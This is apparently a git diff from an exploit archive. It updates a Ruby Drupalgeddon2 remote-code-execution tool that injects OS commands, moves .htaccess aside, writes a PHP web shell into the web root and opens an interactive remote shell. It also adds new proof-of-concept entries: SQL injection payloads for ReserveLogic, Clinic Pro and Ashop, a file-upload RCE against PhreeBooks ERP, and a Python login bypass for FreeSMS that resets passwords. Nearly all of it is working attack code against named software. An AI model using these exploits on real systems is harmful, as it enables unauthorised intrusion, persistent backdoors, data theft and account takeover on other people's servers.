+    #puts warning("WARNING: May benefit to use a PHP web shell") if not try_phpshell and phpfunction != "passthru"
+
+  elsif $drupalverion.start_with?("7") and element == "name"
+    # Method #3 - Drupal v7.x: name, #post_render - HTTP 200
+    url = $target + "#{$clean_url}#{$form}&name[%23post_render][]=" + phpfunction + "&name[%23type]=markup&name[%23markup]=" + evil
     payload = "form_id=user_pass&_triggering_element_name=name"
-  else
-    puts "[!] Unsupported Drupal version"
-    exit
   end
 
-  # Drupal v7 needs an extra value from a form
-  if $drupalverion.start_with?('7')
-    response = http_post(url, payload)
+  # Drupal v7.x needs an extra value from a form
+  if $drupalverion.start_with?("7")
+    response = http_request(url, "post", payload, $session_cookie)
 
-    form_build_id = response.body.match(/input type="hidden" name="form_build_id" value="(.*)"/).to_s().slice(/value="(.*)"/, 1).to_s.strip
-    puts "[!] WARNING: Didn't detect form_build_id" if form_build_id.empty?
+    form_name = "form_build_id"
+    puts verbose("Form name  : #{form_name}") if $verbose
 
-    #url = $target + "file/ajax/name/%23value/" + form_build_id
-    url = $target + "?q=file/ajax/name/%23value/" + form_build_id
-    payload = "form_build_id=" + form_build_id
+    form_value = response.body.match(/input type="hidden" name="#{form_name}" value="(.*)"/).to_s.slice(/value="(.*)"/, 1).to_s.strip
+    puts warning("WARNING: Didn't detect #{form_name}") if form_value.empty?
+    puts verbose("Form value : #{form_value}") if $verbose
+
+    url = $target + "#{$clean_url}file/ajax/name/%23value/" + form_value
+    payload = "#{form_name}=#{form_value}"
   end
 
   return url, payload
 end
 
 
+# Function clean_result <input>
+def clean_result(input)
+  #result = JSON.pretty_generate(JSON[response.body])
+  #result = $drupalverion.start_with?("8")? JSON.parse(clean)[0]["data"] : clean
+  clean = input.to_s.strip
+
+  # PHP function: passthru
+  # For: <payload>[{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
+  clean.slice!(/\[{"command":".*}\]$/)
+
+  # PHP function: exec
+  # For: [{"command":"insert","method":"replaceWith","selector":null,"data":"<payload>\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
+  #clean.slice!(/\[{"command":".*data":"/)
+  #clean.slice!(/\\u003Cspan class=\\u0022.*}\]$/)
+
+  # Newer PHP for an older Drupal
+  # For: <b>Deprecated</b>:  assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />
+  #clean.slice!(/<b>.*<br \/>/)
+
+  # Drupal v8.x Method #2 ~ timezone, #lazy_builder, passthru, HTTP 500
+  # For: <b>Deprecated</b>:  assert(): Calling assert() with a string argument is deprecated in <b>/var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php</b> on line <b>151</b><br />
+  clean.slice!(/The website encountered an unexpected error.*/)
+
+  return clean
+end
+
+
+# Feedback when something goes right
+def success(text)
+  # Green
+  return "\e[#{32}m[+]\e[0m #{text}"
+end
+
+# Feedback when something goes wrong
+def error(text)
+  # Red
+  return "\e[#{31}m[-]\e[0m #{text}"
+end
+
+# Feedback when something may have issues
+def warning(text)
+  # Yellow
+  return "\e[#{33}m[!]\e[0m #{text}"
+end
+
+# Feedback when something doing something
+def action(text)
+  # Blue
+  return "\e[#{34}m[*]\e[0m #{text}"
+end
+
+# Feedback with helpful information
+def info(text)
+  # Light blue
+  return "\e[#{94}m[i]\e[0m #{text}"
+end
+
+# Feedback for the overkill
+def verbose(text)
+  # Dark grey
+  return "\e[#{90}m[v]\e[0m #{text}"
+end
+
+
 # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 
+def init_authentication()
+  $uname = ask('Enter your username:  ') { |q| q.echo = false }
+  $passwd = ask('Enter your password:  ') { |q| q.echo = false }
+  $uname_field = ask('Enter the name of the username form field:  ') { |q| q.echo = true }
+  $passwd_field = ask('Enter the name of the password form field:  ') { |q| q.echo = true }
+  $login_path = ask('Enter your login path (e.g., user/login):  ') { |q| q.echo = true }
+  $creds_suffix = ask('Enter the suffix eventually required after the credentials in the login HTTP POST request (e.g., &form_id=...):  ') { |q| q.echo = true }
+end
+
+def is_arg(args, param)
+  args.each do |arg|
+    if arg == param
+      return true
+    end
+  end
+  return false
+end
+
 
 # Quick how to use
+def usage()
+  puts 'Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]'
+  puts 'Example for target that does not require authentication:'
+  puts '       ruby drupalgeddon2.rb https://example.com'
+  puts 'Example for target that does require authentication:'
+  puts '       ruby drupalgeddon2.rb https://example.com --authentication'
+end
+
+
+# Read in values
 if ARGV.empty?
-  puts "Usage: ruby drupalggedon2.rb <target>"
-  puts "       ruby drupalgeddon2.rb https://example.com"
+  usage()
   exit
 end
-# Read in values
+
 $target = ARGV[0]
+init_authentication() if is_arg(ARGV, '--authentication')
+$verbose = is_arg(ARGV, '--verbose')
 
 
 # Check input for protocol
-if not $target.start_with?('http')
-  $target = "http://#{target}"
-end
+$target = "http://#{$target}" if not $target.start_with?("http")
 # Check input for the end
-if not $target.end_with?('/')
-  $target += "/"
-end
+$target += "/" if not $target.end_with?("/")
 
 
 # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 
 
 # Banner
-puts "[*] --==[::#Drupalggedon2::]==--"
+puts action("--==[::#Drupalggedon2::]==--")
 puts "-"*80
-puts "[*] Target : #{$target}"
-puts "[*] Write? : Skipping writing web shell" if not writeshell
+puts info("Target : #{$target}")
+puts info("Proxy  : #{$proxy_addr}:#{$proxy_port}") if $proxy_addr
+puts info("Write? : Skipping writing PHP web shell") if not try_phpshell
 puts "-"*80
 
 
@@ -127,8 +235,7 @@ puts "-"*80
 
 # Setup connection
 uri = URI($target)
-$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
-
+$http = Net::HTTP.new(uri.host, uri.port, $proxy_addr, $proxy_port)
 
 # Use SSL/TLS if needed
 if uri.scheme == "https"
@@ -136,97 +243,309 @@ if uri.scheme == "https"
   $http.verify_mode = OpenSSL::SSL::VERIFY_NONE
 end
 
+$session_cookie = ''
+# If authentication required then login and get session cookie
+if $uname
+  $payload = $uname_field + '=' + $uname + '&' + $passwd_field + '=' + $passwd + $creds_suffix
+  response = http_request($target + $login_path, 'post', $payload, $session_cookie)
+  if (response.code == '200' or response.code == '303') and not response.body.empty? and response['set-cookie']
+    $session_cookie = response['set-cookie'].split('; ')[0]
+    puts success("Logged in - Session Cookie : #{$session_cookie}")
+  end
+
+end
 
 # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 
 
 # Try and get version
-$drupalverion = nil
+$drupalverion = ""
+
 # Possible URLs
 url = [
+  # --- changelog ---
+  # Drupal v6.x / v7.x [200]
   $target + "CHANGELOG.txt",
+  # Drupal v8.x [200]
   $target + "core/CHANGELOG.txt",
+
+  # --- bootstrap ---
+  # Drupal v7.x / v6.x [403]
   $target + "includes/bootstrap.inc",
+  # Drupal v8.x [403]
   $target + "core/includes/bootstrap.inc",
+
+  # --- database ---
+  # Drupal v7.x / v6.x  [403]
+  $target + "includes/database.inc",
+  # Drupal v7.x [403]
+  #$target + "includes/database/database.inc",
+  # Drupal v8.x [403]
+  #$target + "core/includes/database.inc",
+
+  # --- landing page ---
+  # Drupal v8.x / v7.x [200]
+  $target,
 ]
+
 # Check all
 url.each do|uri|
   # Check response
-  response = http_post(uri)
+  response = http_request(uri, 'get', '', $session_cookie)
 
+  # Check header
+  if response['X-Generator'] and $drupalverion.empty?
+    header = response['X-Generator'].slice(/Drupal (.*) \(https:\/\/www.drupal.org\)/, 1).to_s.strip
+
+    if not header.empty?
+      $drupalverion = "#{header}.x" if $drupalverion.empty?
+      puts success("Header : v#{header} [X-Generator]")
+      puts verbose("X-Generator: #{response['X-Generator']}") if $verbose
+    end
+  end
+
+  # Check request response, valid
   if response.code == "200"
-    puts "[+] Found  : #{uri} (#{response.code})"
+    tmp = $verbose ?  "    [HTTP Size: #{response.size}]"  : ""
+    puts success("Found  : #{uri}    (HTTP Response: #{response.code})#{tmp}")
 
-    # Patched already?
-    puts "[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}" if response.body.include? "SA-CORE-2018-002"
+    # Check to see if it says: The requested URL "http://<URL>" was not found on this server.
+    puts warning("WARNING: Could be a false-positive [1-1], as the file could be reported to be missing") if response.body.downcase.include? "was not found on this server"
 
-    # Try and get version from the file contents
-    $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
+    # Check to see if it says: <h1 class="js-quickedit-page-title title page-title">Page not found</h1> <div class="content">The requested page could not be found.</div>
+    puts warning("WARNING: Could be a false-positive [1-2], as the file could be reported to be missing") if response.body.downcase.include? "the requested page could not be found"
 
-    # If not, try and get it from the URL
-    $drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.empty?
+    # Only works for CHANGELOG.txt
+    if uri.match(/CHANGELOG.txt/)
+      # Check if valid. Source ~ https://api.drupal.org/api/drupal/core%21CHANGELOG.txt/8.5.x // https://api.drupal.org/api/drupal/CHANGELOG.txt/7.x
+      puts warning("WARNING: Unable to detect keyword 'drupal.org'") if not response.body.downcase.include? "drupal.org"
 
-    # Done!
-    break
-  elsif response.code == "403"
-    puts "[+] Found  : #{uri} (#{response.code})"
+      # Patched already? (For Drupal v8.4.x / v7.x)
+      puts warning("WARNING: Might be patched! Found SA-CORE-2018-002: #{url}") if response.body.include? "SA-CORE-2018-002"
+
+      # Try and get version from the file contents (For Drupal v8.4.x / v7.x)
+      $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
+
+      # Blank if not valid
+      $drupalverion = "" if not $drupalverion[-1] =~ /\d/
+    end
+
+    # Check meta tag
+    if not response.body.empty?
+      # For Drupal v8.x / v7.x
+      meta = response.body.match(/<meta name="Generator" content="Drupal (.*) /)
+      metatag = meta.to_s.slice(/meta name="Generator" content="Drupal (.*) \(http/, 1).to_s.strip
+
+      if not metatag.empty?
+        $drupalverion = "#{metatag}.x" if $drupalverion.empty?
+        puts success("Metatag: v#{$drupalverion} [Generator]")
+        puts verbose(meta.to_s) if $verbose
+      end
+    end
+
+    # Done! ...if a full known version, else keep going... may get lucky later!
+    break if not $drupalverion.end_with?("x") and not $drupalverion.empty?
+  end
+
+  # Check request response, not allowed
+  if response.code == "403" and $drupalverion.empty?
+    tmp = $verbose ?  "    [HTTP Size: #{response.size}]"  : ""
+    puts success("Found  : #{uri}    (HTTP Response: #{response.code})#{tmp}")
+
+    if $drupalverion.empty?
+      # Try and get version from the URL (For Drupal v.7.x/v6.x)
+      $drupalverion = uri.match(/includes\/database.inc/)? "7.x/6.x" : "" if $drupalverion.empty?
+      # Try and get version from the URL (For Drupal v8.x)
+      $drupalverion = uri.match(/core/)? "8.x" : "" if $drupalverion.empty?
+
+      # If we got something, show it!
+      puts success("URL    : v#{$drupalverion}?") if not $drupalverion.empty?
+    end
 
-    # Get version from URL
-    $drupalverion = uri.match(/core/)? "8.x" : "7.x"
   else
-    puts "[!] MISSING: #{uri} (#{response.code})"
+    tmp = $verbose ?  "    [HTTP Size: #{response.size}]"  : ""
+    puts warning("MISSING: #{uri}    (HTTP Response: #{response.code})#{tmp}")
   end
 end
 
 
 # Feedback
-if $drupalverion
-  status = $drupalverion.end_with?('x')? "?" : "!"
-  puts "[+] Drupal#{status}: #{$drupalverion}"
+if not $drupalverion.empty?
+  status = $drupalverion.end_with?("x")? "?" : "!"
+  puts success("Drupal#{status}: v#{$drupalverion}")
 else
-  puts "[!] Didn't detect Drupal version"
-  puts "[!] Forcing Drupal v8.x attack"
-  $drupalverion = "8.x"
+  puts error("Didn't detect Drupal version")
+  exit
+end
+
+if not $drupalverion.start_with?("8") and not $drupalverion.start_with?("7")
+  puts error("Unsupported Drupal version (#{$drupalverion})")
+  exit
 end
 puts "-"*80
 
 
 
+
 # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 
 
 
-# Make a request, testing code execution
-puts "[*] Testing: Code Execution"
-# Generate a random string to see if we can echo it
-random = (0...8).map { (65 + rand(26)).chr }.join
-url, payload = gen_evil_url("echo #{random}")
-response = http_post(url, payload)
-if response.code == "200" and not response.body.empty?
-  #result = JSON.pretty_generate(JSON[response.body])
-  result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
-  puts "[+] Result : #{result}"
+# The attack vector to use
+$form = $drupalverion.start_with?("8")? "user/register" : "user/password"
 
-  puts response.body.match(/#{random}/)? "[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!" : "[+] Target might to be exploitable?"
-else
-  puts "[!] Target is NOT exploitable ~ HTTP Response: #{response.code}"
+# Make a request, check for form
+url = "#{$target}?q=#{$form}"
+puts action("Testing: Form   (#{$form})")
+response = http_request(url, 'get', '', $session_cookie)
+if response.code == "200" and not response.body.empty?
+  puts success("Result : Form valid")
+elsif response['location']
+  puts error("Target is NOT exploitable [5] (HTTP Response: #{response.code})...   Could try following the redirect: #{response['location']}")
   exit
+elsif response.code == "404"
+  puts error("Target is NOT exploitable [4] (HTTP Response: #{response.code})...   Form disabled?")
+  exit
+elsif response.code == "403"
+  puts error("Target is NOT exploitable [3] (HTTP Response: #{response.code})...   Form blocked?")
+  exit
+elsif response.body.empty?
+  puts error("Target is NOT exploitable [2] (HTTP Response: #{response.code})...   Got an empty response")
+  exit
+else
+  puts warning("WARNING: Target may NOT exploitable [1] (HTTP Response: #{response.code})")
+end
+
+
+puts "- "*40
+
+
+# Make a request, check for clean URLs status ~ Enabled: /user/register   Disabled: /?q=user/register
+# Drupal v7.x needs it anyway
+$clean_url = $drupalverion.start_with?("8")? "" : "?q="
+url = "#{$target}#{$form}"
+
+puts action("Testing: Clean URLs")
+response = http_request(url, 'get', '', $session_cookie)
+if response.code == "200" and not response.body.empty?
+  puts success("Result : Clean URLs enabled")
+else
+  $clean_url = "?q="
+  puts warning("Result : Clean URLs disabled (HTTP Response: #{response.code})")
+  puts verbose("response.body: #{response.body}") if $verbose
+
+  # Drupal v8.x needs it to be enabled
+  if $drupalverion.start_with?("8")
+    puts error("Sorry dave... Required for Drupal v8.x... So... NOPE NOPE NOPE")
+    exit
+  elsif $drupalverion.start_with?("7")
+    puts info("Isn't an issue for Drupal v7.x")
+  end
 end
 puts "-"*80
 
 
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+# Values in gen_evil_url for Drupal v8.x
+elementsv8 = [
+  "mail",
+  "timezone",
+]
+# Values in gen_evil_url for Drupal v7.x
+elementsv7 = [
+  "name",
+]
+
+elements = $drupalverion.start_with?("8") ? elementsv8 : elementsv7
+
+elements.each do|e|
+  $element = e
+
+  # Make a request, testing code execution
+  puts action("Testing: Code Execution   (Method: #{$element})")
+
+  # Generate a random string to see if we can echo it
+  random = (0...8).map { (65 + rand(26)).chr }.join
+  url, payload = gen_evil_url("echo #{random}", e)
+
+  response = http_request(url, "post", payload, $session_cookie)
+  if (response.code == "200" or response.code == "500") and not response.body.empty?
+    result = clean_result(response.body)
+    if not result.empty?
+      puts success("Result : #{result}")
+
+      if response.body.match(/#{random}/)
+        puts success("Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!")
+        break
+
+      else
+        puts warning("WARNING: Target MIGHT be exploitable [4]...   Detected output, but didn't MATCH expected result")
+      end
+
+    else
+      puts warning("WARNING: Target MIGHT be exploitable [3] (HTTP Response: #{response.code})...   Didn't detect any INJECTED output (disabled PHP function?)")
+    end
+
+    puts warning("WARNING: Target MIGHT be exploitable [5]...   Blind attack?") if response.code == "500"
+
+    puts verbose("response.body: #{response.body}") if $verbose
+    puts verbose("clean_result: #{result}") if not result.empty? and $verbose
+
+  elsif response.body.empty?
+    puts error("Target is NOT exploitable [2] (HTTP Response: #{response.code})...   Got an empty response")
+    exit
+
+  else
+    puts error("Target is NOT exploitable [1] (HTTP Response: #{response.code})")
+    puts verbose("response.body: #{response.body}") if $verbose
+    exit
+  end
+
+  puts "- "*40 if e != elements.last
+end
+
+puts "-"*80
+
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
 # Location of web shell & used to signal if using PHP shell
-webshellpath = nil
+webshellpath = ""
 prompt = "drupalgeddon2"
+
 # Possibles paths to try
 paths = [
-  "./",
-  "./sites/default/",
-  "./sites/default/files/",
+  # Web root
+  "",
+  # Required for setup
+  "sites/default/",
+  "sites/default/files/",
+  # They did something "wrong", chmod -R 0777 .
+  #"core/",
 ]
-# Check all
+# Check all (if doing web shell)
 paths.each do|path|
-  puts "[*] Testing: File Write To Web Root (#{path})"
+  # Check to see if there is already a file there
+  puts action("Testing: Existing file   (#{$target}#{path}#{webshell})")
+
+  response = http_request("#{$target}#{path}#{webshell}", 'get', '', $session_cookie)
+  if response.code == "200"
+    puts warning("Response: HTTP #{response.code} // Size: #{response.size}.   ***Something could already be there?***")
+  else
+    puts info("Response: HTTP #{response.code} // Size: #{response.size}")
+  end
+
+  puts "- "*40
+
+
+  # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+  folder = path.empty? ? "./" : path
+  puts action("Testing: Writing To Web Root   (#{folder})")
 
   # Merge locations
   webshellpath = "#{path}#{webshell}"
@@ -234,41 +553,78 @@ paths.each do|path|
   # Final command to execute
   cmd = "#{bashcmd} | tee #{webshellpath}"
 
+  # By default, Drupal v7.x disables the PHP engine using: ./sites/default/files/.htaccess
+  # ...however, Drupal v8.x disables the PHP engine using: ./.htaccess
+  if path == "sites/default/files/"
+    puts action("Moving : ./sites/default/files/.htaccess")
+    cmd = "mv -f #{path}.htaccess #{path}.htaccess-bak; #{cmd}"
+  end
+
   # Generate evil URLs
-  url, payload = gen_evil_url(cmd)
+  url, payload = gen_evil_url(cmd, $element)
   # Make the request
-  response = http_post(url, payload)
+  response = http_request(url, "post", payload, $session_cookie)
   # Check result
   if response.code == "200" and not response.body.empty?
     # Feedback
-    #result = JSON.pretty_generate(JSON[response.body])
-    result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
-    puts "[+] Result : #{result}"
+    result = clean_result(response.body)
+    puts success("Result : #{result}") if not result.empty?
 
     # Test to see if backdoor is there (if we managed to write it)
-    response = http_post("#{$target}#{webshellpath}", "c=hostname")
+    response = http_request("#{$target}#{webshellpath}", "post", "c=hostname", $session_cookie)
     if response.code == "200" and not response.body.empty?
-      puts "[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!"
+      puts success("Very Good News Everyone! Wrote to the web root! Waayheeeey!!!")
       break
+
+    elsif response.code == "404"
+      puts warning("Target is NOT exploitable [2-4] (HTTP Response: #{response.code})...   Might not have write access?")
+
+    elsif response.code == "403"
+      puts warning("Target is NOT exploitable [2-3] (HTTP Response: #{response.code})...   May not be able to execute PHP from here?")
+
+    elsif response.body.empty?
+      puts warning("Target is NOT exploitable [2-2] (HTTP Response: #{response.code})...   Got an empty response back")
+
     else
-      puts "[!] Target is NOT exploitable. No write access here!"
+      puts warning("Target is NOT exploitable [2-1] (HTTP Response: #{response.code})")
+      puts verbose("response.body: #{response.body}") if $verbose
     end
+
+  elsif response.code == "500" and not response.body.empty?
+    puts warning("Target MAY of been exploited... Bit of blind leading the blind")
+    break
+
+  elsif response.code == "404"
+    puts warning("Target is NOT exploitable [1-4] (HTTP Response: #{response.code})...   Might not have write access?")
+
+  elsif response.code == "403"
+    puts warning("Target is NOT exploitable [1-3] (HTTP Response: #{response.code})...   May not be able to execute PHP from here?")
+
+  elsif response.body.empty?
+    puts warning("Target is NOT exploitable [1-2] (HTTP Response: #{response.code}))...   Got an empty response back")
+
   else
-    puts "[!] Target is NOT exploitable for some reason ~ HTTP Response: #{response.code}"
+    puts warning("Target is NOT exploitable [1-1] (HTTP Response: #{response.code})")
+    puts verbose("response.body: #{response.body}") if $verbose
   end
-  webshellpath = nil
-end if writeshell
-puts "-"*80 if writeshell
 
-if webshellpath
+  webshellpath = ""
+
+  puts "- "*40 if path != paths.last
+end if try_phpshell
+
+# If a web path was set, we exploited using PHP!
+if not webshellpath.empty?
   # Get hostname for the prompt
-  prompt = response.body.to_s.strip
+  prompt = response.body.to_s.strip if response.code == "200" and not response.body.empty?
 
-  # Feedback
-  puts "[*] Fake shell:   curl '#{$target}#{webshell}' -d 'c=whoami'"
-elsif writeshell
-  puts "[!] FAILED to find writeable folder"
-  puts "[*] Dropping back to ugly shell..."
+  puts "-"*80
+  puts info("Fake PHP shell:   curl '#{$target}#{webshellpath}' -d 'c=hostname'")
+# Should we be trying to call commands via PHP?
+elsif try_phpshell
+  puts warning("FAILED : Couldn't find a writeable web path")
+  puts "-"*80
+  puts action("Dropping back to direct OS commands")
 end
 
 
@@ -279,27 +635,32 @@ trap("INT", "SIG_IGN")
 # Forever loop
 loop do
   # Default value
-  result = "ERROR"
+  result = "~ERROR~"
 
   # Get input
   command = Readline.readline("#{prompt}>> ", true).to_s
 
+  # Check input
+  puts warning("WARNING: Detected an known bad character (>)") if command =~ />/
+
   # Exit
-  break if command =~ /exit/
+  break if command == "exit"
 
   # Blank link?
   next if command.empty?
 
-  # If PHP shell
-  if webshellpath
+  # If PHP web shell
+  if not webshellpath.empty?
     # Send request
-    result = http_post("#{$target}#{webshell}", "c=#{command}").body
-  # Direct commands
+    result = http_request("#{$target}#{webshellpath}", "post", "c=#{command}", $session_cookie).body
+  # Direct OS commands
   else
-    url, payload = gen_evil_url(command, false)
-    response = http_post(url, payload)
-    if response.code == "200" and not response.body.empty?
-      result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
+    url, payload = gen_evil_url(command, $element, true)
+    response = http_request(url, "post", payload, $session_cookie)
+
+    # Check result
+    if not response.body.empty?
+      result = clean_result(response.body)
     end
   end
 
diff --git a/exploits/php/webapps/46640.txt b/exploits/php/webapps/46640.txt
new file mode 100644
index 000000000..262677c5d
--- /dev/null
+++ b/exploits/php/webapps/46640.txt
@@ -0,0 +1,15 @@
+# Exploit Title: iScripts ReserveLogic - SQL Injection
+# Date: 29.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.iscripts.com/reservelogic/
+# Demo Site: https://www.demo.iscripts.com/reservelogic/demo/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/search
+Vulnerable Parameter: jqSearchDestination (POST)
+Payload: jqSearchDestination=(SELECT (CASE WHEN (8124=8124) THEN 12345 ELSE
+(SELECT 3029 UNION SELECT 1241) END))
\ No newline at end of file
diff --git a/exploits/php/webapps/46642.txt b/exploits/php/webapps/46642.txt
new file mode 100644
index 000000000..0db0cd59e
--- /dev/null
+++ b/exploits/php/webapps/46642.txt
@@ -0,0 +1,31 @@
+# Title: Clinic Pro - Clinic Management Software
+# Date: 03.04.2019
+# Exploit Author: Abdullah Çelebi
+# Vendor Homepage: https://softwebinternational.com
+# Software Link: https://cms.softwebinternational.com
+# Category: Webapps
+# Tested on: WAMPP @Win
+# Software description:
+It is developed by PHP Codeigniter Framework with HMVC Pattern. Clinic
+system can be easily configured and fully automated as per clinic
+requirement using this Automation Software.
+
+# Vulnerabilities:
+# An attacker can access all data following an authorized user login using
+the parameter.
+
+
+# POC - SQLi :
+
+# Parameter: month (POST)
+# Request URL: http://localhost/welcome/monthly_expense_overview
+#    Type : boolean-based blind
+month=06%' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 06 ELSE 0x28 END)) AND
+'%'='
+
+#    Type : time-based blind
+month=06%' AND 4514=BENCHMARK(5000000,MD5(0x436d7970)) AND '%'='
+
+#    Type : error-based
+month=06%' AND EXTRACTVALUE(2633,CONCAT(0x5c,0x7178766271,(SELECT
+(ELT(2633=2633,1))),0x7171717171)) AND '%'='
\ No newline at end of file
diff --git a/exploits/php/webapps/46643.txt b/exploits/php/webapps/46643.txt
new file mode 100644
index 000000000..f47084a75
--- /dev/null
+++ b/exploits/php/webapps/46643.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Ashop Shopping Cart Software - SQL Injection
+# Date: 03.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: http://www.ashopsoftware.com
+# Software Link: https://sourceforge.net/projects/ashop/
+# Demo Site: http://demo.ashopsoftware.com/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/index.php?cat=1&exp=&shop=1
+Vulnerable Parameter: shop (GET)
+Payload: cat=1&exp=&shop=-5438') UNION ALL SELECT
+CONCAT(0x71786b6a71,0x6357557777645143654a726369774c4167665278634a46617758614d66506b46434f4b7669565054,0x716a787671),NULL--
+fmIb
\ No newline at end of file
diff --git a/exploits/php/webapps/46644.txt b/exploits/php/webapps/46644.txt
new file mode 100644
index 000000000..15b915943
--- /dev/null
+++ b/exploits/php/webapps/46644.txt
@@ -0,0 +1,85 @@
+PhreeBooks ERP v5.2.3 - Arbitrary File Upload
+
+# Date: 03.04.2019
+# Exploit Author: Abdullah Çelebi
+# Vendor Homepage: https://www.phreesoft.com/
+# Software Link: https://sourceforge.net/projects/phreebooks/files/latest/download
+# Category: Webapps
+# Version: 5.2.3
+# Tested on: WAMPP @Win
+# Software description:
+PhreeBooks 5 is a completely new web based application that utilizes the
+redesigned Bizuno ERP library from PhreeSoft. Bizuno supports PHP 7 along
+with all the latest versions of mySQL. Additionally, Bizuno utilizes the
+jQuery EasyUI graphical interface and will be also enhanced for mobile
+devices and tablets.
+
+# Vulnerabilities:
+# An attacker could run a remote code after an authorized user login using
+the parameter.
+
+# Code Section @Tools>Image Manager
+
+//
+<script type="text/javascript">
+
+function imgAction(action) { jq('#imgAction').val(action); imgRefresh(); }
+function imgClickImg(strImage) {
+    var lastChar = strImage.substr(strImage.length - 1);
+    if (lastChar == '/') {
+        jq('#imgMgrPath').val(jq('#imgMgrPath').val()+'/'+strImage);
+        jq('#imgAction').val('refresh');
+        imgRefresh();
+    } else if (jq('#imgTarget').val()) {
+        var target = jq('#imgTarget').val();
+        var path   = jq('#imgMgrPath').val();
+        var fullPath= path ? path+'/'+strImage : strImage;
+        jq('#imgTarget').val(fullPath);
+        jq('#'+target).val(fullPath);
+        jq('#img_'+target).attr('src',
+bizunoAjaxFS+'&src=0/images/'+fullPath);
+        bizWindowClose('winImgMgr');
+    }
+}
+function imgRefresh() {
+    var target = jq('#imgTarget').val();
+    var path   = jq('#imgMgrPath').val();
+    var search = jq('#imgSearch').val();
+    var action = jq('#imgAction').val();
+    var shref  =
+'index.php?&p=bizuno/image/manager&imgTarget='+target+'&imgMgrPath='+path+'&imgSearch='+search+'&imgAction=';
+    if (action == 'upload') {
+        jq('#frmImgMgr').submit(function (e) {
+            jq.ajax({
+                url:        shref+'upload',
+                type:       'post',
+                data:       new FormData(this),
+                mimeType:   'multipart/form-data',
+                contentType:false,
+                cache:      false,
+                processData:false,
+                success:    function (data) { processJson(data);
+jq('#winImgMgr').window('refresh',shref+'refresh'); }
+            });
+            e.preventDefault();
+        });
+        jq('#frmImgMgr').submit();
+    } else {
+        jq('#winImgMgr').window('refresh', shref+action);
+    }
+}
+jq('#winImgMgr').window({'title':'Image Manager: /'});
+</script>
+
+
+
+# POC - RCE via Arbitrary File Upload :
+
+Process during upload malicious file;
+http://localhost/PhreeBooksERP/index.php?&p=bizuno/image/manager&imgTarget=&imgMgrPath=&imgSearch=&imgAction=upload
+
+Post section details;
+imgSearch=&imgFile=evilcode_key.php
+
+Result;
+http://localhost/PhreeBooksERP/bizunoFS.php?&src=0/images/evilcode_key.php
\ No newline at end of file
diff --git a/exploits/php/webapps/46658.py b/exploits/php/webapps/46658.py
new file mode 100755
index 000000000..e49ee7bd8
--- /dev/null
+++ b/exploits/php/webapps/46658.py
@@ -0,0 +1,60 @@
+# Exploit Title: FreeSMS 2.1.2 - Authentication Bypass
+# Date: 2019-04-03
+# Exploit Author: Yilmaz Degirmenci
+# Vendor Homepage: https://freesms.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/freesms/
+# Version: v2.1.2
+# Category: Webapps
+# Tested on: LAMPP for Linux
+# Software Description : FreeSMS is a PHP based application to manage an educational facility 
+# of teachers and students alike. It is a teacher and student management system providing marketing, 
+# registration, course management, attendance and a student evaluation system.
+# ==================================================================
+# The "password" parameter has boolean-based blind SQL injection vulnerability.
+# The login panel can be bypassed if the user name is known.
+# SQLDork: pass") RLIKE (SELECT (CASE WHEN (4404=4404) THEN 0x61646d696e74 ELSE 0x28 END)) AND ("WpaN"="WpaN
+# Exploit allows the creation of a new password on the target.
+
+import requests, sys, re, random
+
+if (len(sys.argv) != 2):
+    print "[*] Usage: poc.py <RHOST><RPATH> (192.168.1.20/freesms)"
+    exit(0)
+
+rhost = sys.argv[1]
+
+uname = str(raw_input("User Name: "))
+npass = str(raw_input("New Pass: "))
+
+url = "http://"+rhost+"/pages/crc_handler.php?method=login"
+headers = {"Content-Type": "application/x-www-form-urlencoded"}
+
+data = {"username": ""+uname+"", "password": "pass\") RLIKE (SELECT (CASE WHEN (4404=4404) THEN 0x61646d696e74 ELSE 0x28 END)) AND (\"WpaN\"=\"WpaN", "context": "ou=Don Mills,ou=Toronto,ou=Ontario,ou=Canada,o=CRC World", "login": "login"}
+
+bp = bypass = requests.post(url, headers=headers, data=data)
+
+if bp.status_code == 200:
+  print "Authentication bypass was successful!"
+  print "Trying to change password..."
+else:
+  print "Something went wrong. You should try manual exploitation"
+  sys.exit()
+
+cookies = bypass.headers['Set-Cookie']
